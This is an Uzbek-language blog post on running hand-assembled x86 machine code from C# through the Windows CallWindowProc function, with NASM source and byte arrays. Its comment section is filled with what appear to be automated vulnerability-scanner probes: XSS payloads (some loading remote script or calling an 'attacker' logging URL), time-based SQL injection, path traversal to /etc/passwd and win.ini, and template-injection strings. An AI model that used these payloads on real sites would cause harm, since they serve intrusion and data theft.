Muallif
June 11, 2024
1506Bo'sh vaqtlarimda boshqotirma sifatida quyi darajali dasturlash bilan qiziq turganim uchun doim boshqa tillarga assemblerda yozilgan kodlarni tiqishtirib yuraman. Qilmoqchi bo'lgan ishimni to'iq assemblerda yozib qo'ya qolay desam unda boshqotirma emas boshog'riqqa aylanib ketib qolishidan ko'ra, sh
Aslida .NET platformada CLI uchun o'zini "rodnoy" assembleri bor albatta. Buni IL (Oraliq til) deyiladi. .NET platformadagi ko'p tillar ushbu tilga kompilyasiya qilinadi va JIT kompilyator tomonidan bajariladi. Bunda yozilgan kod .NET dagi yuqori darajali tillardan biroz tezroq ishlaydi. Sababi kompilyasiya jarayonida optimizasiyani dastur odamchalik eplolmasligida albatta. Hullas hozir bizni IL qiziqtirmaydi, maqsad faqat "toza" assembler.
Demak, Windows API tarkibida CallWindowProc degan funksiya bor. Ushbu funksiya oyna "obrabotchigini" chaqirish uchun ishlatiladi. Ya'ni, odatda oynalarni subclassing qilishda. Sodda qilib aytganda, masalan, biz qandaydir oynani **"obrabotchigi"**ni o'rniga o'zimizni **"obrabotchik"**ni qo'yib, kelayotgan kerakli habarlarni "eshitib", unga mos amallarni bajaramiz va bizga keraksiz habarlar shunchaki yo'q bo'lib ketmasligi uchun eski obrabotchikni chaqirib qo'yamiz, "senga quyidagi habar bor" mazmunida. Bunda CallWindowProc ga oyaning eski "obrabotchigi" joylashgan manzilni beramiz (buni oldin aniqlab olgan bo'lamiz albatta). Bunday olib qarasak shu manzilni o'rniga ihtiyoriy kod joylashgan manzilni ham berishimiz mumkin. Ushbu usulda Visual Basic da "toza" kodlarni chaqirishda ishlatardim. Buning uchun oldin kodni biror assemblerda yozib, natijaviy mashina kodlarini biror massivga yozib, CallWindowProc ga ushbu massiv ko'rsatkichini (pointer) uzatilardi. C# da yoziladigan kodlar CLR tomonidan doimiy nazorat ostidaligini bilamiz (managed code). Pointerlar, xotira bilan to'g'ridan to'g'ri ishlab bo'lmaslik va boshqa cheklovlar ataylab kiritilgan. Dastur xavfsizligini oshirish maqsadida albatta. Biroq Microsoftdagi okalar buyerda emin-erkin (unmanaged) yozish uchun ham har qalay biroz imkon qoldirishgan. C# da unsafe kalit so'zi ostida boshqaruvsiz kodlar qo'yish, fixed blogi ostida pointerlar bilan ishlash mumkin. Biz ham shundan foydalanamiz. Avvalo C# dan chaqiradigan mashina kodidagi dasturni biror assemblerda yozib olamiz. Man NASM dan foydalanaman. Boshlanishiga faqat 2 ta sonni qo'shadigan kodda tekshirib ko'ramiz. 1.asm fayl yaratamiz (masalan notepad++ da):
%Define param1 [ebp+4] ; param1 %Define param2 [ebp+8] ; param2 %Define param3 [ebp+12] ; param3 %Define param4 [ebp+16] ; param4 [BITS 32] mov ebp, esp mov edi, param1 mov eax, [edi] mov edi, param2 add eax, [edi] mov edi, param3 mov [edi], eax mov esp, ebp ret
Yuqoridagini nasm da kompilyasiya qilamiz:
nasmw -f bin 1.asm -o 1.bin
-f kaliti natijaviy dasturni koddan tashqari ma'lumotlarsiz hosil qiladi. DOS dagi .com kabi, faqatgina kodni o'zi. Natijada 20 baytli 1.bin degan fayl hosil bo'ladi.
Visual Studio ga o'tib C# da konsolli proyekt yaratamiz.
using System;
using System.Runtime.InteropServices;
namespace ConsoleApplication1
{
unsafe class Program
{
[DllImport("User32.dll")]
public static extern IntPtr CallWindowProc(byte* ptr,
int* param1 , int* param2 ,
int* param3 , int* param4 );
static void Main(string[] args)
{
// mashina kodi
byte[] code ={0x89, 0xe5, 0x8b, 0x7d, 0x04, 0x8b, 0x07, 0x8b, 0x7d, 0x08, 0x03,
0x07, 0x8b, 0x7d, 0x0c, 0x89, 0x07, 0x89, 0xec, 0xc3, 0x00};
// code uchun pointerni olish va o'zgaruvchilar uchun
// "qo'zg'almas" hududga kirish
fixed (byte* pointer = &code[0])
{
int p1, p2, p3, p4;
p1 = 15; p2 = 75; p3 = p4 = 0;
Console.WriteLine("Avval: p1={0} p2={1} p3={2} p4={3}", p1, p2, p3, p4);
// kodni chaqirish
CallWindowProc(pointer, &p1, &p2, &p3, &p4);
Console.WriteLine("Keyin: p1={0} p2={1} p3={2} p4={3}", p1, p2, p3, p4);
Console.ReadKey();
}
}
}
}
Class dagi unsafe kalit so'zi nega kerakligini aytdim, unmanaged kod uchun kerak. code nomli massivga natijaviy 1.bin fayli tarkibi yozilgan. Buni qo'lda yozib chiqmaslik uchun boshqa oddiy bir dasturcha qilib oldim, yoki shu dasturni ichida fayldan o'qib olish ham mumkin. pointer nomli o'zgaruvchiga code massivini ko'rsatkichini olamiz va "qo'zg'almas" sohaga kiramiz. Qolgani tushunarli bo'lsa kerak. CallWindowProc funksiyaga kod yozilgan manzilni (pointer) va 4 ta parametrlarni beramiz.
Omadli chipta haqidagi masalani ham shunday ishlatib natijasini solishtirib ko'rdim. Ushbu misolni c# ni o'zidagi yechimidan ~5 marta tezroq hisoblandi. Albatta bu bilan demak assemblerdagi kod C# dagidan faqat 4 marta tez ishlar ekan deb hulosa chiqarish noto'g'ri. Haqiqiy tezliklarini solishtirish uchun hamma kodni assemblerda yozish kerak va boshqa maxsus testlardan foydalanish lozim bo'ladi. Shunday bo'lsada yetarlicha tezroq deyishimiz mumkin. Va ushbu narsa VB da menga ko'p asqotar edi.
Omadli chipta kodi:
byte[] code={0x55, 0x89, 0xe5, 0x81, 0xec, 0x0c, 0x00, 0x00, 0x00, 0x8b, 0x7d,
0x08, 0x8b, 0x07, 0x89, 0x45, 0xf8, 0x8b, 0x7d, 0x10, 0x8b, 0x07,
0x89, 0x45, 0xf4, 0x31, 0xc9, 0x51, 0x8b, 0x7d, 0x0c, 0xc7, 0x07,
0x01, 0x00, 0x00, 0x00, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x51, 0x89,
0xc8, 0xe8, 0x35, 0x00, 0x00, 0x00, 0x89, 0x5d, 0xfc, 0x89, 0xd9,
0x51, 0x89, 0xc8, 0xe8, 0x28, 0x00, 0x00, 0x00, 0x3b, 0x5d, 0xfc,
0x75, 0x05, 0x8b, 0x7d, 0x0c, 0xff, 0x07, 0x59, 0x81, 0xc1, 0x09,
0x00, 0x00, 0x00, 0x3b, 0x4d, 0xf8, 0x72, 0xe2, 0x59, 0x41, 0x3b,
0x4d, 0xf8, 0x72, 0xce, 0x59, 0x41, 0x3b, 0x4d, 0xf4, 0x72, 0xb8,
0x89, 0xec, 0x5d, 0xc3, 0x31, 0xdb, 0x31, 0xd2, 0xb9, 0x0a, 0x00,
0x00, 0x00, 0xf7, 0xf1, 0x01, 0xd3, 0x85, 0xc0, 0x75, 0xf1, 0xc3,
0x00};
April 11, 2026
555
April 11, 2026
555'"()&%<zzz><ScRiPt >BNZG(9076)</ScRiPt>
April 11, 2026
pMt8n98O
April 11, 2026
../../../../../../../../../../../../../../etc/passwd
April 11, 2026
'"()&%<zzz><ScRiPt >BNZG(9948)</ScRiPt>
April 11, 2026
1ZPvF4u6: ezpmXqqi
April 11, 2026
../../../../../../../../../../../../../../windows/win.ini
April 11, 2026
12345'"\'\");|]*�{ <�>�''💡
April 11, 2026
file:///etc/passwd
April 11, 2026
5559528687
April 11, 2026
555
April 11, 2026
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
April 11, 2026
../555
April 11, 2026
bfg5774<s1﹥s2ʺs3ʹhjl5774
April 11, 2026
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
April 11, 2026
Http://bxss.me/t/fit.txt
April 11, 2026
bfgx4505��z1��z2a�bcxhjl4505
April 11, 2026
http://bxss.me/t/fit.txt?.jpg
April 11, 2026
/etc/shells
April 11, 2026
555
April 11, 2026
<%={{={@{#{${dfb}}%>
April 11, 2026
../../../../../../../../../../../../../../etc/shells
April 11, 2026
c:/windows/win.ini
April 11, 2026
<th:t="${dfb}#foreach
April 11, 2026
bxss.me
April 11, 2026
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
April 11, 2026
555
April 11, 2026
)
April 11, 2026
!(()&&!|*|*|
April 11, 2026
dfb{{98991*97996}}xca
April 11, 2026
^(#$!@#$)(()))******
April 11, 2026
dfb[[${98991*97996}]]xca
April 11, 2026
dfb__${98991*97996}__::.x
April 11, 2026
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
April 11, 2026
555<ScRiPt >BNZG(9413)</ScRiPt>
April 11, 2026
555<WOLSOK>GJ6EE[!+!]</WOLSOK>
April 11, 2026
555<script>BNZG(9115)</script>
April 11, 2026
555<script>BNZG(9257)</script>9257
April 11, 2026
555<ScR<ScRiPt>IpT>BNZG(9816)</sCr<ScRiPt>IpT>
April 11, 2026
555<ScRiPt >BNZG(9126)</ScRiPt>
April 11, 2026
555
April 11, 2026
-1 OR 2+134-134-1=0+0+0+1 --
April 11, 2026
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9982></ScRiPt>
April 11, 2026
-1 OR 2+480-480-1=0+0+0+1
April 11, 2026
-1' OR 2+866-866-1=0+0+0+1 --
April 11, 2026
555<�ScRiPt >BNZG(9845)</ScRiPt>
April 11, 2026
-1' OR 2+185-185-1=0+0+0+1 or 'ioVga7GD'='
April 11, 2026
-1" OR 2+383-383-1=0+0+0+1 --
April 11, 2026
555<svg ��onload=BNZG(9976);>
April 11, 2026
555<isindex type=image src=1 onerror=BNZG(9099)>
April 11, 2026
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9384'>
April 11, 2026
555<body onload=BNZG(9083)>
April 11, 2026
555<img src=//xss.bxss.me/t/dot.gif onload=BNZG(9413)>
April 11, 2026
555<img src=xyz OnErRor=BNZG(9137)>
April 11, 2026
555<img/src=">" onerror=alert(9528)>
April 11, 2026
%35%35%35%3C%53%63%52%69%50%74%20%3E%42%4E%5A%47%289127%29%3C%2F%73%43%72%69%70%54%3E
April 11, 2026
555\u003CScRiPt\BNZG(9516)\u003C/sCripT\u003E
April 11, 2026
555<ScRiPt>BNZG(9531)</sCripT>
April 11, 2026
�<img zzz onmouseover=BNZG(91381) //�>
April 11, 2026
555*if(now()=sysdate(),sleep(15),0)
April 11, 2026
555<input autofocus onfocus=BNZG(9380)>
April 11, 2026
<a HrEF=http://xss.bxss.me></a>
April 11, 2026
<a HrEF=jaVaScRiPT:>
April 11, 2026
555}body{zzz:Expre/**/SSion(BNZG(9270))}
April 11, 2026
555kvroB <ScRiPt >BNZG(9712)</ScRiPt>
April 11, 2026
555<WWRAPX>IQJWV[!+!]</WWRAPX>
April 11, 2026
555<ifRAme sRc=9914.com></IfRamE>
April 11, 2026
555<a7bGmDF x=9522>
April 11, 2026
555<img sRc='http://attacker-9054/log.php?
April 11, 2026
555<aBgq8wi<
April 11, 2026
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
April 11, 2026
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
April 11, 2026
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
April 11, 2026
555-1; waitfor delay '0:0:15' --
April 11, 2026
555-1); waitfor delay '0:0:15' --
April 11, 2026
555-1 waitfor delay '0:0:15' --
April 11, 2026
555RXc16B4D'; waitfor delay '0:0:15' --
April 11, 2026
555-1 OR 198=(SELECT 198 FROM PG_SLEEP(15))--
April 11, 2026
555-1) OR 38=(SELECT 38 FROM PG_SLEEP(15))--
April 11, 2026
555-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
April 11, 2026
555O4lSNj2R' OR 23=(SELECT 23 FROM PG_SLEEP(15))--
April 11, 2026
5555p5ghCIR') OR 508=(SELECT 508 FROM PG_SLEEP(15))--
April 11, 2026
555hHQ5y6gO')) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
April 11, 2026
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
April 11, 2026
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
April 11, 2026
555
April 11, 2026
555'"
April 11, 2026
555����%2527%2522\'\"
April 11, 2026
@@k7624
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
DTqJc1a8
April 11, 2026
555
April 11, 2026
555
April 11, 2026
V6ElE0NL: oP8Wl2WP
April 11, 2026
555'"()&%<zzz><ScRiPt >t9Jn(9932)</ScRiPt>
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
'"()&%<zzz><ScRiPt >t9Jn(9842)</ScRiPt>
April 11, 2026
555
April 11, 2026
555
April 11, 2026
../../../../../../../../../../../../../../etc/passwd
April 11, 2026
12345'"\'\");|]*�{ <�>�''💡
April 11, 2026
5559242476
April 11, 2026
555
April 11, 2026
../../../../../../../../../../../../../../windows/win.ini
April 11, 2026
555
April 11, 2026
file:///etc/passwd
April 11, 2026
bfg5042<s1﹥s2ʺs3ʹhjl5042
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
../555
April 11, 2026
bfgx4475��z1��z2a�bcxhjl4475
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
<%={{={@{#{${dfb}}%>
April 11, 2026
555
April 11, 2026
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
April 11, 2026
555
April 11, 2026
555
April 11, 2026
<th:t="${dfb}#foreach
April 11, 2026
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
April 11, 2026
555
April 11, 2026
Http://bxss.me/t/fit.txt
April 11, 2026
555
April 11, 2026
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
April 11, 2026
http://bxss.me/t/fit.txt?.jpg
April 11, 2026
)
April 11, 2026
/etc/shells
April 11, 2026
!(()&&!|*|*|
April 11, 2026
dfb{{98991*97996}}xca
April 11, 2026
../../../../../../../../../../../../../../etc/shells
April 11, 2026
^(#$!@#$)(()))******
April 11, 2026
c:/windows/win.ini
April 11, 2026
dfb[[${98991*97996}]]xca
April 11, 2026
bxss.me
April 11, 2026
dfb__${98991*97996}__::.x
April 11, 2026
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
April 11, 2026
555<ScRiPt >t9Jn(9024)</ScRiPt>
April 11, 2026
555<WEE6DF>LBKZN[!+!]</WEE6DF>
April 11, 2026
555<script>t9Jn(9970)</script>
April 11, 2026
555
April 11, 2026
555<script>t9Jn(9909)</script>9909
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555<ScR<ScRiPt>IpT>t9Jn(9322)</sCr<ScRiPt>IpT>
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555<ScRiPt >t9Jn(9097)</ScRiPt>
April 11, 2026
555
April 11, 2026
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9578></ScRiPt>
April 11, 2026
555<�ScRiPt >t9Jn(9509)</ScRiPt>
April 11, 2026
555<svg ��onload=t9Jn(9397);>
April 11, 2026
555<isindex type=image src=1 onerror=t9Jn(9888)>
April 11, 2026
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9996'>
April 11, 2026
555<body onload=t9Jn(9699)>
April 11, 2026
555<img src=//xss.bxss.me/t/dot.gif onload=t9Jn(9574)>
April 11, 2026
555<img src=xyz OnErRor=t9Jn(9344)>
April 11, 2026
555<img/src=">" onerror=alert(9858)>
April 11, 2026
555
April 11, 2026
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%39%4A%6E%289779%29%3C%2F%73%43%72%69%70%54%3E
April 11, 2026
555\u003CScRiPt\t9Jn(9740)\u003C/sCripT\u003E
April 11, 2026
555<ScRiPt>t9Jn(9150)</sCripT>
April 11, 2026
�<img zzz onmouseover=t9Jn(92591) //�>
April 11, 2026
555<input autofocus onfocus=t9Jn(9194)>
April 11, 2026
<a HrEF=http://xss.bxss.me></a>
April 11, 2026
<a HrEF=jaVaScRiPT:>
April 11, 2026
555}body{zzz:Expre/**/SSion(t9Jn(9878))}
April 11, 2026
555
April 11, 2026
555O45eF <ScRiPt >t9Jn(9996)</ScRiPt>
April 11, 2026
555<WSLUHB>IUXNQ[!+!]</WSLUHB>
April 11, 2026
555<ifRAme sRc=9609.com></IfRamE>
April 11, 2026
555<aMmH0kE x=9701>
April 11, 2026
555<img sRc='http://attacker-9150/log.php?
April 11, 2026
555<a9YqcPi<
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555
April 11, 2026
-1 OR 2+473-473-1=0+0+0+1 --
April 11, 2026
-1 OR 2+33-33-1=0+0+0+1
April 11, 2026
-1' OR 2+544-544-1=0+0+0+1 --
April 11, 2026
-1' OR 2+232-232-1=0+0+0+1 or 'jAZzbcBw'='
April 11, 2026
-1" OR 2+611-611-1=0+0+0+1 --
April 11, 2026
555*if(now()=sysdate(),sleep(15),0)
April 11, 2026
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
April 11, 2026
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
April 11, 2026
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
April 11, 2026
555-1; waitfor delay '0:0:15' --
April 11, 2026
555-1); waitfor delay '0:0:15' --
April 11, 2026
555-1 waitfor delay '0:0:15' --
April 11, 2026
5554MgV9rzN'; waitfor delay '0:0:15' --
April 11, 2026
555-1 OR 375=(SELECT 375 FROM PG_SLEEP(15))--
April 11, 2026
555-1) OR 415=(SELECT 415 FROM PG_SLEEP(15))--
April 11, 2026
555-1)) OR 907=(SELECT 907 FROM PG_SLEEP(15))--
April 11, 2026
55552RSYcPl' OR 166=(SELECT 166 FROM PG_SLEEP(15))--
April 11, 2026
555kEOZUp74') OR 297=(SELECT 297 FROM PG_SLEEP(15))--
April 11, 2026
5555LB4svQ9')) OR 699=(SELECT 699 FROM PG_SLEEP(15))--
April 11, 2026
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
April 11, 2026
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
April 11, 2026
555
April 11, 2026
555'"
April 11, 2026
555����%2527%2522\'\"
April 11, 2026
@@k8yOP
April 11, 2026
555
April 11, 2026
555
April 11, 2026
555